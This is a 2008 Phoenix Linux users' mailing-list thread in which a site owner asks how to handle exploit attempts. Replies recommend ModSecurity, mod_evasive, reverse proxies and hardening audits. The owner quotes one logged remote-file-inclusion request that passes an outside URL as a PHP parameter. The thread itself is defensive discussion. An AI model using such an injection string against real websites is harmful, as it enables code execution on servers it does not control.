OT: Website Exploits
Lisa Kachold
lisakachold at obnosis.com
Wed Dec 3 16:23:09 MST 2008
ModSecurity used to terminally slow down web systems adding a great deal of load while actually doing little denial and only verbose exploit logging assistance in return, while also opening the system to additional Denial of Service threat conditions.THIS HAS CHANGED, however there are still some risks to flat implementation of ModSecurity. For instance, you can't really layer good engineering over bad and expect miracles?ModSecurity Limitations and Caveats:1) Stateful Request Monitoring - Layer 7 Application Firewallhttp://www.modsecurity.org/http://adeptus-mechanicus.com/codex/apchems/apchems.htmlDon't try to run anything but the current versions do to known security risks!2) Capacity PlanningBut beware before playing with modsecurity!ModSecurity can be exploited itself - since it's easy to DoS, and slows down requests, however if you have the processing power, use ModEvasive protection also:http://adeptus-mechanicus.com/codex/apcheme/apcheme.htmlhttp://www.associatedcontent.com/article/6379/about_modsecurity_and_moddosevasive.html3) Of course a fine Reverse Proxy security setup might also be fun! You have a test network right?http://linuxadministration.wordpress.com/2007/09/06/advance-apache-security-mod_proxymod_securitymod_evasive/4) A complete security appraisal of your current index.php, CMS version, Php.ini and Apache version would be in order. Do you KNOW the exploits currently available for your system? I.E. Are you running Joomla, Web 2.0, Mambo or another CMS drop and deploy application?Each item, from your kernel, your SSL, Apache, Mysql, version and each php tool built upon it has it's known security holes. A saavy security systems administrator might do well to know each and play for upgrades or layered tools to mitigate the risk.Are you using a custom web development binary, or a drop in yum Apache/Php for instance? Various known issues exist with versions configured right out of the box; what hardening was completed?www.Obnosis.com | http://en.wiktionary.org/wiki/Citations:obnosis |
http://www.urbandictionary.com/define.php?term=obnosis (503)754-4452Catch the January PLUG HackFest! Kristy Westphal, CSO for the Arizona Department of Economic
Security will provide a one hour
presentation on forensics.Date: Wed, 3 Dec 2008 15:48:17 -0700From: jd at twingeckos.comTo: klsmith2020 at yahoo.com; plug-discuss at lists.plug.phoenix.az.usSubject: Re: OT: Website ExploitsThat is a fairly common tactic. It exploits poor input validation and register globals in PHP.Do yourself a huge favor and install mod_security (I assume you're using apache?)as an extra measure of security if you haven't already.
On Wed, Dec 3, 2008 at 3:39 PM, keith smith <klsmith2020 at yahoo.com> wrote:
Hi,I am working on a website that gets a lot of exploit attempts.They mostly look like this: /index.php?display=http://humano.ya.com/mysons/index.htm?
Our code is set to disregard any value that is not expected. I'm wondering if there is a clearing house for reporting this type of stuff. I have the IP address as reported.... if that is accurate.
Thanks in advance!Keith
---------------------------------------------------
PLUG-discuss mailing list - PLUG-discuss at lists.plug.phoenix.az.us
To subscribe, unsubscribe, or to change your mail settings:
http://lists.PLUG.phoenix.az.us/mailman/listinfo/plug-discuss
_________________________________________________________________
Send e-mail faster without improving your typing skills.
http://windowslive.com/Explore/hotmail?ocid=TXT_TAGLM_WL_hotmail_acq_speed_122008
-------------- next part --------------
An HTML attachment was scrubbed...
URL: http://lists.PLUG.phoenix.az.us/pipermail/plug-discuss/attachments/20081203/94a529e9/attachment.htm
More information about the PLUG-discuss
mailing list